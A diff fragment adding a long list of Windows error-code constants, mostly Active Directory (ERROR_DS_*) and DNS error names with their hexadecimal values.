+ERROR_DS_INCORRECT_ROLE_OWNER = 0x00002012
+ERROR_DS_RIDMGR_INIT_ERROR = 0x00002013
+ERROR_DS_OBJ_CLASS_VIOLATION = 0x00002014
+ERROR_DS_CANT_ON_NON_LEAF = 0x00002015
+ERROR_DS_CANT_ON_RDN = 0x00002016
+ERROR_DS_CANT_MOD_OBJ_CLASS = 0x00002017
+ERROR_DS_CROSS_DOM_MOVE_ERROR = 0x00002018
+ERROR_DS_GC_NOT_AVAILABLE = 0x00002019
+ERROR_SHARED_POLICY = 0x0000201a
+ERROR_POLICY_OBJECT_NOT_FOUND = 0x0000201b
+ERROR_POLICY_ONLY_IN_DS = 0x0000201c
+ERROR_PROMOTION_ACTIVE = 0x0000201d
+ERROR_NO_PROMOTION_ACTIVE = 0x0000201e
+ERROR_DS_OPERATIONS_ERROR = 0x00002020
+ERROR_DS_PROTOCOL_ERROR = 0x00002021
+ERROR_DS_TIMELIMIT_EXCEEDED = 0x00002022
+ERROR_DS_SIZELIMIT_EXCEEDED = 0x00002023
+ERROR_DS_ADMIN_LIMIT_EXCEEDED = 0x00002024
+ERROR_DS_COMPARE_FALSE = 0x00002025
+ERROR_DS_COMPARE_TRUE = 0x00002026
+ERROR_DS_AUTH_METHOD_NOT_SUPPORTED = 0x00002027
+ERROR_DS_STRONG_AUTH_REQUIRED = 0x00002028
+ERROR_DS_INAPPROPRIATE_AUTH = 0x00002029
+ERROR_DS_AUTH_UNKNOWN = 0x0000202a
+ERROR_DS_REFERRAL = 0x0000202b
+ERROR_DS_UNAVAILABLE_CRIT_EXTENSION = 0x0000202c
+ERROR_DS_CONFIDENTIALITY_REQUIRED = 0x0000202d
+ERROR_DS_INAPPROPRIATE_MATCHING = 0x0000202e
+ERROR_DS_CONSTRAINT_VIOLATION = 0x0000202f
+ERROR_DS_NO_SUCH_OBJECT = 0x00002030
+ERROR_DS_ALIAS_PROBLEM = 0x00002031
+ERROR_DS_INVALID_DN_SYNTAX = 0x00002032
+ERROR_DS_IS_LEAF = 0x00002033
+ERROR_DS_ALIAS_DEREF_PROBLEM = 0x00002034
+ERROR_DS_UNWILLING_TO_PERFORM = 0x00002035
+ERROR_DS_LOOP_DETECT = 0x00002036
+ERROR_DS_NAMING_VIOLATION = 0x00002037
+ERROR_DS_OBJECT_RESULTS_TOO_LARGE = 0x00002038
+ERROR_DS_AFFECTS_MULTIPLE_DSAS = 0x00002039
+ERROR_DS_SERVER_DOWN = 0x0000203a
+ERROR_DS_LOCAL_ERROR = 0x0000203b
+ERROR_DS_ENCODING_ERROR = 0x0000203c
+ERROR_DS_DECODING_ERROR = 0x0000203d
+ERROR_DS_FILTER_UNKNOWN = 0x0000203e
+ERROR_DS_PARAM_ERROR = 0x0000203f
+ERROR_DS_NOT_SUPPORTED = 0x00002040
+ERROR_DS_NO_RESULTS_RETURNED = 0x00002041
+ERROR_DS_CONTROL_NOT_FOUND = 0x00002042
+ERROR_DS_CLIENT_LOOP = 0x00002043
+ERROR_DS_REFERRAL_LIMIT_EXCEEDED = 0x00002044
+ERROR_DS_SORT_CONTROL_MISSING = 0x00002045
+ERROR_DS_OFFSET_RANGE_ERROR = 0x00002046
+ERROR_DS_RIDMGR_DISABLED = 0x00002047
+ERROR_DS_ROOT_MUST_BE_NC = 0x0000206d
+ERROR_DS_ADD_REPLICA_INHIBITED = 0x0000206e
+ERROR_DS_ATT_NOT_DEF_IN_SCHEMA = 0x0000206f
+ERROR_DS_MAX_OBJ_SIZE_EXCEEDED = 0x00002070
+ERROR_DS_OBJ_STRING_NAME_EXISTS = 0x00002071
+ERROR_DS_NO_RDN_DEFINED_IN_SCHEMA = 0x00002072
+ERROR_DS_RDN_DOESNT_MATCH_SCHEMA = 0x00002073
+ERROR_DS_NO_REQUESTED_ATTS_FOUND = 0x00002074
+ERROR_DS_USER_BUFFER_TO_SMALL = 0x00002075
+ERROR_DS_ATT_IS_NOT_ON_OBJ = 0x00002076
+ERROR_DS_ILLEGAL_MOD_OPERATION = 0x00002077
+ERROR_DS_OBJ_TOO_LARGE = 0x00002078
+ERROR_DS_BAD_INSTANCE_TYPE = 0x00002079
+ERROR_DS_MASTERDSA_REQUIRED = 0x0000207a
+ERROR_DS_OBJECT_CLASS_REQUIRED = 0x0000207b
+ERROR_DS_MISSING_REQUIRED_ATT = 0x0000207c
+ERROR_DS_ATT_NOT_DEF_FOR_CLASS = 0x0000207d
+ERROR_DS_ATT_ALREADY_EXISTS = 0x0000207e
+ERROR_DS_CANT_ADD_ATT_VALUES = 0x00002080
+ERROR_DS_SINGLE_VALUE_CONSTRAINT = 0x00002081
+ERROR_DS_RANGE_CONSTRAINT = 0x00002082
+ERROR_DS_ATT_VAL_ALREADY_EXISTS = 0x00002083
+ERROR_DS_CANT_REM_MISSING_ATT = 0x00002084
+ERROR_DS_CANT_REM_MISSING_ATT_VAL = 0x00002085
+ERROR_DS_ROOT_CANT_BE_SUBREF = 0x00002086
+ERROR_DS_NO_CHAINING = 0x00002087
+ERROR_DS_NO_CHAINED_EVAL = 0x00002088
+ERROR_DS_NO_PARENT_OBJECT = 0x00002089
+ERROR_DS_PARENT_IS_AN_ALIAS = 0x0000208a
+ERROR_DS_CANT_MIX_MASTER_AND_REPS = 0x0000208b
+ERROR_DS_CHILDREN_EXIST = 0x0000208c
+ERROR_DS_OBJ_NOT_FOUND = 0x0000208d
+ERROR_DS_ALIASED_OBJ_MISSING = 0x0000208e
+ERROR_DS_BAD_NAME_SYNTAX = 0x0000208f
+ERROR_DS_ALIAS_POINTS_TO_ALIAS = 0x00002090
+ERROR_DS_CANT_DEREF_ALIAS = 0x00002091
+ERROR_DS_OUT_OF_SCOPE = 0x00002092
+ERROR_DS_OBJECT_BEING_REMOVED = 0x00002093
+ERROR_DS_CANT_DELETE_DSA_OBJ = 0x00002094
+ERROR_DS_GENERIC_ERROR = 0x00002095
+ERROR_DS_DSA_MUST_BE_INT_MASTER = 0x00002096
+ERROR_DS_CLASS_NOT_DSA = 0x00002097
+ERROR_DS_INSUFF_ACCESS_RIGHTS = 0x00002098
+ERROR_DS_ILLEGAL_SUPERIOR = 0x00002099
+ERROR_DS_ATTRIBUTE_OWNED_BY_SAM = 0x0000209a
+ERROR_DS_NAME_TOO_MANY_PARTS = 0x0000209b
+ERROR_DS_NAME_TOO_LONG = 0x0000209c
+ERROR_DS_NAME_VALUE_TOO_LONG = 0x0000209d
+ERROR_DS_NAME_UNPARSEABLE = 0x0000209e
+ERROR_DS_NAME_TYPE_UNKNOWN = 0x0000209f
+ERROR_DS_NOT_AN_OBJECT = 0x000020a0
+ERROR_DS_SEC_DESC_TOO_SHORT = 0x000020a1
+ERROR_DS_SEC_DESC_INVALID = 0x000020a2
+ERROR_DS_NO_DELETED_NAME = 0x000020a3
+ERROR_DS_SUBREF_MUST_HAVE_PARENT = 0x000020a4
+ERROR_DS_NCNAME_MUST_BE_NC = 0x000020a5
+ERROR_DS_CANT_ADD_SYSTEM_ONLY = 0x000020a6
+ERROR_DS_CLASS_MUST_BE_CONCRETE = 0x000020a7
+ERROR_DS_INVALID_DMD = 0x000020a8
+ERROR_DS_OBJ_GUID_EXISTS = 0x000020a9
+ERROR_DS_NOT_ON_BACKLINK = 0x000020aa
+ERROR_DS_NO_CROSSREF_FOR_NC = 0x000020ab
+ERROR_DS_SHUTTING_DOWN = 0x000020ac
+ERROR_DS_UNKNOWN_OPERATION = 0x000020ad
+ERROR_DS_INVALID_ROLE_OWNER = 0x000020ae
+ERROR_DS_COULDNT_CONTACT_FSMO = 0x000020af
+ERROR_DS_CROSS_NC_DN_RENAME = 0x000020b0
+ERROR_DS_CANT_MOD_SYSTEM_ONLY = 0x000020b1
+ERROR_DS_REPLICATOR_ONLY = 0x000020b2
+ERROR_DS_OBJ_CLASS_NOT_DEFINED = 0x000020b3
+ERROR_DS_OBJ_CLASS_NOT_SUBCLASS = 0x000020b4
+ERROR_DS_NAME_REFERENCE_INVALID = 0x000020b5
+ERROR_DS_CROSS_REF_EXISTS = 0x000020b6
+ERROR_DS_CANT_DEL_MASTER_CROSSREF = 0x000020b7
+ERROR_DS_SUBTREE_NOTIFY_NOT_NC_HEAD = 0x000020b8
+ERROR_DS_NOTIFY_FILTER_TOO_COMPLEX = 0x000020b9
+ERROR_DS_DUP_RDN = 0x000020ba
+ERROR_DS_DUP_OID = 0x000020bb
+ERROR_DS_DUP_MAPI_ID = 0x000020bc
+ERROR_DS_DUP_SCHEMA_ID_GUID = 0x000020bd
+ERROR_DS_DUP_LDAP_DISPLAY_NAME = 0x000020be
+ERROR_DS_SEMANTIC_ATT_TEST = 0x000020bf
+ERROR_DS_SYNTAX_MISMATCH = 0x000020c0
+ERROR_DS_EXISTS_IN_MUST_HAVE = 0x000020c1
+ERROR_DS_EXISTS_IN_MAY_HAVE = 0x000020c2
+ERROR_DS_NONEXISTENT_MAY_HAVE = 0x000020c3
+ERROR_DS_NONEXISTENT_MUST_HAVE = 0x000020c4
+ERROR_DS_AUX_CLS_TEST_FAIL = 0x000020c5
+ERROR_DS_NONEXISTENT_POSS_SUP = 0x000020c6
+ERROR_DS_SUB_CLS_TEST_FAIL = 0x000020c7
+ERROR_DS_BAD_RDN_ATT_ID_SYNTAX = 0x000020c8
+ERROR_DS_EXISTS_IN_AUX_CLS = 0x000020c9
+ERROR_DS_EXISTS_IN_SUB_CLS = 0x000020ca
+ERROR_DS_EXISTS_IN_POSS_SUP = 0x000020cb
+ERROR_DS_RECALCSCHEMA_FAILED = 0x000020cc
+ERROR_DS_TREE_DELETE_NOT_FINISHED = 0x000020cd
+ERROR_DS_CANT_DELETE = 0x000020ce
+ERROR_DS_ATT_SCHEMA_REQ_ID = 0x000020cf
+ERROR_DS_BAD_ATT_SCHEMA_SYNTAX = 0x000020d0
+ERROR_DS_CANT_CACHE_ATT = 0x000020d1
+ERROR_DS_CANT_CACHE_CLASS = 0x000020d2
+ERROR_DS_CANT_REMOVE_ATT_CACHE = 0x000020d3
+ERROR_DS_CANT_REMOVE_CLASS_CACHE = 0x000020d4
+ERROR_DS_CANT_RETRIEVE_DN = 0x000020d5
+ERROR_DS_MISSING_SUPREF = 0x000020d6
+ERROR_DS_CANT_RETRIEVE_INSTANCE = 0x000020d7
+ERROR_DS_CODE_INCONSISTENCY = 0x000020d8
+ERROR_DS_DATABASE_ERROR = 0x000020d9
+ERROR_DS_GOVERNSID_MISSING = 0x000020da
+ERROR_DS_MISSING_EXPECTED_ATT = 0x000020db
+ERROR_DS_NCNAME_MISSING_CR_REF = 0x000020dc
+ERROR_DS_SECURITY_CHECKING_ERROR = 0x000020dd
+ERROR_DS_SCHEMA_NOT_LOADED = 0x000020de
+ERROR_DS_SCHEMA_ALLOC_FAILED = 0x000020df
+ERROR_DS_ATT_SCHEMA_REQ_SYNTAX = 0x000020e0
+ERROR_DS_GCVERIFY_ERROR = 0x000020e1
+ERROR_DS_DRA_SCHEMA_MISMATCH = 0x000020e2
+ERROR_DS_CANT_FIND_DSA_OBJ = 0x000020e3
+ERROR_DS_CANT_FIND_EXPECTED_NC = 0x000020e4
+ERROR_DS_CANT_FIND_NC_IN_CACHE = 0x000020e5
+ERROR_DS_CANT_RETRIEVE_CHILD = 0x000020e6
+ERROR_DS_SECURITY_ILLEGAL_MODIFY = 0x000020e7
+ERROR_DS_CANT_REPLACE_HIDDEN_REC = 0x000020e8
+ERROR_DS_BAD_HIERARCHY_FILE = 0x000020e9
+ERROR_DS_BUILD_HIERARCHY_TABLE_FAILED = 0x000020ea
+ERROR_DS_CONFIG_PARAM_MISSING = 0x000020eb
+ERROR_DS_COUNTING_AB_INDICES_FAILED = 0x000020ec
+ERROR_DS_HIERARCHY_TABLE_MALLOC_FAILED = 0x000020ed
+ERROR_DS_INTERNAL_FAILURE = 0x000020ee
+ERROR_DS_UNKNOWN_ERROR = 0x000020ef
+ERROR_DS_ROOT_REQUIRES_CLASS_TOP = 0x000020f0
+ERROR_DS_REFUSING_FSMO_ROLES = 0x000020f1
+ERROR_DS_MISSING_FSMO_SETTINGS = 0x000020f2
+ERROR_DS_UNABLE_TO_SURRENDER_ROLES = 0x000020f3
+ERROR_DS_DRA_GENERIC = 0x000020f4
+ERROR_DS_DRA_INVALID_PARAMETER = 0x000020f5
+ERROR_DS_DRA_BUSY = 0x000020f6
+ERROR_DS_DRA_BAD_DN = 0x000020f7
+ERROR_DS_DRA_BAD_NC = 0x000020f8
+ERROR_DS_DRA_DN_EXISTS = 0x000020f9
+ERROR_DS_DRA_INTERNAL_ERROR = 0x000020fa
+ERROR_DS_DRA_INCONSISTENT_DIT = 0x000020fb
+ERROR_DS_DRA_CONNECTION_FAILED = 0x000020fc
+ERROR_DS_DRA_BAD_INSTANCE_TYPE = 0x000020fd
+ERROR_DS_DRA_OUT_OF_MEM = 0x000020fe
+ERROR_DS_DRA_MAIL_PROBLEM = 0x000020ff
+ERROR_DS_DRA_REF_ALREADY_EXISTS = 0x00002100
+ERROR_DS_DRA_REF_NOT_FOUND = 0x00002101
+ERROR_DS_DRA_OBJ_IS_REP_SOURCE = 0x00002102
+ERROR_DS_DRA_DB_ERROR = 0x00002103
+ERROR_DS_DRA_NO_REPLICA = 0x00002104
+ERROR_DS_DRA_ACCESS_DENIED = 0x00002105
+ERROR_DS_DRA_NOT_SUPPORTED = 0x00002106
+ERROR_DS_DRA_RPC_CANCELLED = 0x00002107
+ERROR_DS_DRA_SOURCE_DISABLED = 0x00002108
+ERROR_DS_DRA_SINK_DISABLED = 0x00002109
+ERROR_DS_DRA_NAME_COLLISION = 0x0000210a
+ERROR_DS_DRA_SOURCE_REINSTALLED = 0x0000210b
+ERROR_DS_DRA_MISSING_PARENT = 0x0000210c
+ERROR_DS_DRA_PREEMPTED = 0x0000210d
+ERROR_DS_DRA_ABANDON_SYNC = 0x0000210e
+ERROR_DS_DRA_SHUTDOWN = 0x0000210f
+ERROR_DS_DRA_INCOMPATIBLE_PARTIAL_SET = 0x00002110
+ERROR_DS_DRA_SOURCE_IS_PARTIAL_REPLICA = 0x00002111
+ERROR_DS_DRA_EXTN_CONNECTION_FAILED = 0x00002112
+ERROR_DS_INSTALL_SCHEMA_MISMATCH = 0x00002113
+ERROR_DS_DUP_LINK_ID = 0x00002114
+ERROR_DS_NAME_ERROR_RESOLVING = 0x00002115
+ERROR_DS_NAME_ERROR_NOT_FOUND = 0x00002116
+ERROR_DS_NAME_ERROR_NOT_UNIQUE = 0x00002117
+ERROR_DS_NAME_ERROR_NO_MAPPING = 0x00002118
+ERROR_DS_NAME_ERROR_DOMAIN_ONLY = 0x00002119
+ERROR_DS_NAME_ERROR_NO_SYNTACTICAL_MAPPING = 0x0000211a
+ERROR_DS_CONSTRUCTED_ATT_MOD = 0x0000211b
+ERROR_DS_WRONG_OM_OBJ_CLASS = 0x0000211c
+ERROR_DS_DRA_REPL_PENDING = 0x0000211d
+ERROR_DS_DS_REQUIRED = 0x0000211e
+ERROR_DS_INVALID_LDAP_DISPLAY_NAME = 0x0000211f
+ERROR_DS_NON_BASE_SEARCH = 0x00002120
+ERROR_DS_CANT_RETRIEVE_ATTS = 0x00002121
+ERROR_DS_BACKLINK_WITHOUT_LINK = 0x00002122
+ERROR_DS_EPOCH_MISMATCH = 0x00002123
+ERROR_DS_SRC_NAME_MISMATCH = 0x00002124
+ERROR_DS_SRC_AND_DST_NC_IDENTICAL = 0x00002125
+ERROR_DS_DST_NC_MISMATCH = 0x00002126
+ERROR_DS_NOT_AUTHORITIVE_FOR_DST_NC = 0x00002127
+ERROR_DS_SRC_GUID_MISMATCH = 0x00002128
+ERROR_DS_CANT_MOVE_DELETED_OBJECT = 0x00002129
+ERROR_DS_PDC_OPERATION_IN_PROGRESS = 0x0000212a
+ERROR_DS_CROSS_DOMAIN_CLEANUP_REQD = 0x0000212b
+ERROR_DS_ILLEGAL_XDOM_MOVE_OPERATION = 0x0000212c
+ERROR_DS_CANT_WITH_ACCT_GROUP_MEMBERSHPS = 0x0000212d
+ERROR_DS_NC_MUST_HAVE_NC_PARENT = 0x0000212e
+ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE = 0x0000212f
+ERROR_DS_DST_DOMAIN_NOT_NATIVE = 0x00002130
+ERROR_DS_MISSING_INFRASTRUCTURE_CONTAINER = 0x00002131
+ERROR_DS_CANT_MOVE_ACCOUNT_GROUP = 0x00002132
+ERROR_DS_CANT_MOVE_RESOURCE_GROUP = 0x00002133
+ERROR_DS_INVALID_SEARCH_FLAG = 0x00002134
+ERROR_DS_NO_TREE_DELETE_ABOVE_NC = 0x00002135
+ERROR_DS_COULDNT_LOCK_TREE_FOR_DELETE = 0x00002136
+ERROR_DS_COULDNT_IDENTIFY_OBJECTS_FOR_TREE_DELETE = 0x00002137
+ERROR_DS_SAM_INIT_FAILURE = 0x00002138
+ERROR_DS_SENSITIVE_GROUP_VIOLATION = 0x00002139
+ERROR_DS_CANT_MOD_PRIMARYGROUPID = 0x0000213a
+ERROR_DS_ILLEGAL_BASE_SCHEMA_MOD = 0x0000213b
+ERROR_DS_NONSAFE_SCHEMA_CHANGE = 0x0000213c
+ERROR_DS_SCHEMA_UPDATE_DISALLOWED = 0x0000213d
+ERROR_DS_CANT_CREATE_UNDER_SCHEMA = 0x0000213e
+ERROR_DS_INSTALL_NO_SRC_SCH_VERSION = 0x0000213f
+ERROR_DS_INSTALL_NO_SCH_VERSION_IN_INIFILE = 0x00002140
+ERROR_DS_INVALID_GROUP_TYPE = 0x00002141
+ERROR_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0x00002142
+ERROR_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0x00002143
+ERROR_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0x00002144
+ERROR_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0x00002145
+ERROR_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0x00002146
+ERROR_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0x00002147
+ERROR_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0x00002148
+ERROR_DS_HAVE_PRIMARY_MEMBERS = 0x00002149
+ERROR_DS_STRING_SD_CONVERSION_FAILED = 0x0000214a
+ERROR_DS_NAMING_MASTER_GC = 0x0000214b
+ERROR_DS_DNS_LOOKUP_FAILURE = 0x0000214c
+ERROR_DS_COULDNT_UPDATE_SPNS = 0x0000214d
+ERROR_DS_CANT_RETRIEVE_SD = 0x0000214e
+ERROR_DS_KEY_NOT_UNIQUE = 0x0000214f
+ERROR_DS_WRONG_LINKED_ATT_SYNTAX = 0x00002150
+ERROR_DS_SAM_NEED_BOOTKEY_PASSWORD = 0x00002151
+ERROR_DS_SAM_NEED_BOOTKEY_FLOPPY = 0x00002152
+ERROR_DS_CANT_START = 0x00002153
+ERROR_DS_INIT_FAILURE = 0x00002154
+ERROR_DS_NO_PKT_PRIVACY_ON_CONNECTION = 0x00002155
+ERROR_DS_SOURCE_DOMAIN_IN_FOREST = 0x00002156
+ERROR_DS_DESTINATION_DOMAIN_NOT_IN_FOREST = 0x00002157
+ERROR_DS_DESTINATION_AUDITING_NOT_ENABLED = 0x00002158
+ERROR_DS_CANT_FIND_DC_FOR_SRC_DOMAIN = 0x00002159
+ERROR_DS_SRC_OBJ_NOT_GROUP_OR_USER = 0x0000215a
+ERROR_DS_SRC_SID_EXISTS_IN_FOREST = 0x0000215b
+ERROR_DS_SRC_AND_DST_OBJECT_CLASS_MISMATCH = 0x0000215c
+ERROR_SAM_INIT_FAILURE = 0x0000215d
+ERROR_DS_DRA_SCHEMA_INFO_SHIP = 0x0000215e
+ERROR_DS_DRA_SCHEMA_CONFLICT = 0x0000215f
+ERROR_DS_DRA_EARLIER_SCHEMA_CONFLICT = 0x00002160
+ERROR_DS_DRA_OBJ_NC_MISMATCH = 0x00002161
+ERROR_DS_NC_STILL_HAS_DSAS = 0x00002162
+ERROR_DS_GC_REQUIRED = 0x00002163
+ERROR_DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0x00002164
+ERROR_DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0x00002165
+ERROR_DS_CANT_ADD_TO_GC = 0x00002166
+ERROR_DS_NO_CHECKPOINT_WITH_PDC = 0x00002167
+ERROR_DS_SOURCE_AUDITING_NOT_ENABLED = 0x00002168
+ERROR_DS_CANT_CREATE_IN_NONDOMAIN_NC = 0x00002169
+ERROR_DS_INVALID_NAME_FOR_SPN = 0x0000216a
+ERROR_DS_FILTER_USES_CONTRUCTED_ATTRS = 0x0000216b
+ERROR_DS_UNICODEPWD_NOT_IN_QUOTES = 0x0000216c
+ERROR_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0x0000216d
+ERROR_DS_MUST_BE_RUN_ON_DST_DC = 0x0000216e
+ERROR_DS_SRC_DC_MUST_BE_SP4_OR_GREATER = 0x0000216f
+ERROR_DS_CANT_TREE_DELETE_CRITICAL_OBJ = 0x00002170
+ERROR_DS_INIT_FAILURE_CONSOLE = 0x00002171
+ERROR_DS_SAM_INIT_FAILURE_CONSOLE = 0x00002172
+ERROR_DS_FOREST_VERSION_TOO_HIGH = 0x00002173
+ERROR_DS_DOMAIN_VERSION_TOO_HIGH = 0x00002174
+ERROR_DS_FOREST_VERSION_TOO_LOW = 0x00002175
+ERROR_DS_DOMAIN_VERSION_TOO_LOW = 0x00002176
+ERROR_DS_INCOMPATIBLE_VERSION = 0x00002177
+ERROR_DS_LOW_DSA_VERSION = 0x00002178
+ERROR_DS_NO_BEHAVIOR_VERSION_IN_MIXEDDOMAIN = 0x00002179
+ERROR_DS_NOT_SUPPORTED_SORT_ORDER = 0x0000217a
+ERROR_DS_NAME_NOT_UNIQUE = 0x0000217b
+ERROR_DS_MACHINE_ACCOUNT_CREATED_PRENT4 = 0x0000217c
+ERROR_DS_OUT_OF_VERSION_STORE = 0x0000217d
+ERROR_DS_INCOMPATIBLE_CONTROLS_USED = 0x0000217e
+ERROR_DS_NO_REF_DOMAIN = 0x0000217f
+ERROR_DS_RESERVED_LINK_ID = 0x00002180
+ERROR_DS_LINK_ID_NOT_AVAILABLE = 0x00002181
+ERROR_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0x00002182
+ERROR_DS_MODIFYDN_DISALLOWED_BY_INSTANCE_TYPE = 0x00002183
+ERROR_DS_NO_OBJECT_MOVE_IN_SCHEMA_NC = 0x00002184
+ERROR_DS_MODIFYDN_DISALLOWED_BY_FLAG = 0x00002185
+ERROR_DS_MODIFYDN_WRONG_GRANDPARENT = 0x00002186
+ERROR_DS_NAME_ERROR_TRUST_REFERRAL = 0x00002187
+ERROR_NOT_SUPPORTED_ON_STANDARD_SERVER = 0x00002188
+ERROR_DS_CANT_ACCESS_REMOTE_PART_OF_AD = 0x00002189
+ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE_V2 = 0x0000218a
+ERROR_DS_THREAD_LIMIT_EXCEEDED = 0x0000218b
+ERROR_DS_NOT_CLOSEST = 0x0000218c
+ERROR_DS_CANT_DERIVE_SPN_WITHOUT_SERVER_REF = 0x0000218d
+ERROR_DS_SINGLE_USER_MODE_FAILED = 0x0000218e
+ERROR_DS_NTDSCRIPT_SYNTAX_ERROR = 0x0000218f
+ERROR_DS_NTDSCRIPT_PROCESS_ERROR = 0x00002190
+ERROR_DS_DIFFERENT_REPL_EPOCHS = 0x00002191
+ERROR_DS_DRS_EXTENSIONS_CHANGED = 0x00002192
+ERROR_DS_REPLICA_SET_CHANGE_NOT_ALLOWED_ON_DISABLED_CR = 0x00002193
+ERROR_DS_NO_MSDS_INTID = 0x00002194
+ERROR_DS_DUP_MSDS_INTID = 0x00002195
+ERROR_DS_EXISTS_IN_RDNATTID = 0x00002196
+ERROR_DS_AUTHORIZATION_FAILED = 0x00002197
+ERROR_DS_INVALID_SCRIPT = 0x00002198
+ERROR_DS_REMOTE_CROSSREF_OP_FAILED = 0x00002199
+ERROR_DS_CROSS_REF_BUSY = 0x0000219a
+ERROR_DS_CANT_DERIVE_SPN_FOR_DELETED_DOMAIN = 0x0000219b
+ERROR_DS_CANT_DEMOTE_WITH_WRITEABLE_NC = 0x0000219c
+ERROR_DS_DUPLICATE_ID_FOUND = 0x0000219d
+ERROR_DS_INSUFFICIENT_ATTR_TO_CREATE_OBJECT = 0x0000219e
+ERROR_DS_GROUP_CONVERSION_ERROR = 0x0000219f
+ERROR_DS_CANT_MOVE_APP_BASIC_GROUP = 0x000021a0
+ERROR_DS_CANT_MOVE_APP_QUERY_GROUP = 0x000021a1
+ERROR_DS_ROLE_NOT_VERIFIED = 0x000021a2
+ERROR_DS_WKO_CONTAINER_CANNOT_BE_SPECIAL = 0x000021a3
+ERROR_DS_DOMAIN_RENAME_IN_PROGRESS = 0x000021a4
+ERROR_DS_EXISTING_AD_CHILD_NC = 0x000021a5
+ERROR_DS_REPL_LIFETIME_EXCEEDED = 0x000021a6
+ERROR_DS_DISALLOWED_IN_SYSTEM_CONTAINER = 0x000021a7
+ERROR_DS_LDAP_SEND_QUEUE_FULL = 0x000021a8
+ERROR_DS_DRA_OUT_SCHEDULE_WINDOW = 0x000021a9
+ERROR_DS_POLICY_NOT_KNOWN = 0x000021aa
+ERROR_NO_SITE_SETTINGS_OBJECT = 0x000021ab
+ERROR_NO_SECRETS = 0x000021ac
+ERROR_NO_WRITABLE_DC_FOUND = 0x000021ad
+ERROR_DS_NO_SERVER_OBJECT = 0x000021ae
+ERROR_DS_NO_NTDSA_OBJECT = 0x000021af
+ERROR_DS_NON_ASQ_SEARCH = 0x000021b0
+ERROR_DS_AUDIT_FAILURE = 0x000021b1
+ERROR_DS_INVALID_SEARCH_FLAG_SUBTREE = 0x000021b2
+ERROR_DS_INVALID_SEARCH_FLAG_TUPLE = 0x000021b3
+ERROR_DS_HIERARCHY_TABLE_TOO_DEEP = 0x000021b4
+ERROR_DS_DRA_CORRUPT_UTD_VECTOR = 0x000021b5
+ERROR_DS_DRA_SECRETS_DENIED = 0x000021b6
+ERROR_DS_RESERVED_MAPI_ID = 0x000021b7
+ERROR_DS_MAPI_ID_NOT_AVAILABLE = 0x000021b8
+ERROR_DS_DRA_MISSING_KRBTGT_SECRET = 0x000021b9
+ERROR_DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0x000021ba
+ERROR_DS_FLAT_NAME_EXISTS_IN_FOREST = 0x000021bb
+ERROR_INVALID_USER_PRINCIPAL_NAME = 0x000021bc
+ERROR_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0x000021bd
+ERROR_DS_OID_NOT_FOUND = 0x000021be
+ERROR_DS_DRA_RECYCLED_TARGET = 0x000021bf
+ERROR_DS_DISALLOWED_NC_REDIRECT = 0x000021c0
+ERROR_DS_HIGH_ADLDS_FFL = 0x000021c1
+ERROR_DS_HIGH_DSA_VERSION = 0x000021c2
+ERROR_DS_LOW_ADLDS_FFL = 0x000021c3
+ERROR_DOMAIN_SID_SAME_AS_LOCAL_WORKSTATION = 0x000021c4
+ERROR_DS_UNDELETE_SAM_VALIDATION_FAILED = 0x000021c5
+ERROR_INCORRECT_ACCOUNT_TYPE = 0x000021c6
+DNS_ERROR_RCODE_FORMAT_ERROR = 0x00002329
+DNS_ERROR_RCODE_SERVER_FAILURE = 0x0000232a
+DNS_ERROR_RCODE_NAME_ERROR = 0x0000232b
+DNS_ERROR_RCODE_NOT_IMPLEMENTED = 0x0000232c
+DNS_ERROR_RCODE_REFUSED = 0x0000232d
+DNS_ERROR_RCODE_YXDOMAIN = 0x0000232e
+DNS_ERROR_RCODE_YXRRSET = 0x0000232f
+DNS_ERROR_RCODE_NXRRSET = 0x00002330
+DNS_ERROR_RCODE_NOTAUTH = 0x00002331
+DNS_ERROR_RCODE_NOTZONE = 0x00002332
+DNS_ERROR_RCODE_BADSIG = 0x00002338
+DNS_ERROR_RCODE_BADKEY = 0x00002339
+DNS_ERROR_RCODE_BADTIME = 0x0000233a
+DNS_ERROR_KEYMASTER_REQUIRED = 0x0000238d
+DNS_ERROR_NOT_ALLOWED_ON_SIGNED_ZONE = 0x0000238e
+DNS_ERROR_NSEC3_INCOMPATIBLE_WITH_RSA_SHA1 = 0x0000238f
+DNS_ERROR_NOT_ENOUGH_SIGNING_KEY_DESCRIPTORS = 0x00002390
+DNS_ERROR_UNSUPPORTED_ALGORITHM = 0x00002391
+DNS_ERROR_INVALID_KEY_SIZE = 0x00002392
+DNS_ERROR_SIGNING_KEY_NOT_ACCESSIBLE = 0x00002393
+DNS_ERROR_KSP_DOES_NOT_SUPPORT_PROTECTION = 0x00002394
+DNS_ERROR_UNEXPECTED_DATA_PROTECTION_ERROR = 0x00002395
+DNS_ERROR_UNEXPECTED_CNG_ERROR = 0x00002396
+DNS_ERROR_UNKNOWN_SIGNING_PARAMETER_VERSION = 0x00002397
+DNS_ERROR_KSP_NOT_ACCESSIBLE = 0x00002398
+DNS_ERROR_TOO_MANY_SKDS = 0x00002399
+DNS_ERROR_INVALID_ROLLOVER_PERIOD = 0x0000239a
+DNS_ERROR_INVALID_INITIAL_ROLLOVER_OFFSET = 0x0000239b
+DNS_ERROR_ROLLOVER_IN_PROGRESS = 0x0000239c
+DNS_ERROR_STANDBY_KEY_NOT_PRESENT = 0x0000239d
+DNS_ERROR_NOT_ALLOWED_ON_ZSK = 0x0000239e
+DNS_ERROR_NOT_ALLOWED_ON_ACTIVE_SKD = 0x0000239f
+DNS_ERROR_ROLLOVER_ALREADY_QUEUED = 0x000023a0
+DNS_ERROR_NOT_ALLOWED_ON_UNSIGNED_ZONE = 0x000023a1
+DNS_ERROR_BAD_KEYMASTER = 0x000023a2
